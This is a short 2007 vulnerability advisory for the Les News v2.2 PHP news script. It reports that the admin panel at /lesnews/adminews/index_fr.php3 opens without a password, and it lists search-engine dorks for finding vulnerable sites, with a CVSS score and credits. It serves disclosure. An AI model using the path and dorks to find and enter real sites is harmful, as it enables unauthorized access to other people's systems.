Les News v2.2 [Admin news without password]

2007.02.12
Credit: sn0oPy
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

* Les News v2.2 [Admin news without password] * By : sn0oPy * Risk : verry high * site : http://stombi.free.fr/ * exploit : add to the /lesnews/ rep adminews/index_fr.php3 exemple : http://www.test.ma/lesnews/lesnews_fr.php3 http://www.test.ma/lesnews/adminews/index_fr.php3 Dork : inurl:"/lesnews/lesnews_fr.php3" inurl:"/lesnews/lesnews_en.php3" inurl:"/lesnews/lesnews_de.php3" inurl:"/lesnews/lesnews_it.php3" * contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed] * greetz : [subzero], http://forums.avenir-geopolitique.net. reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2622


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top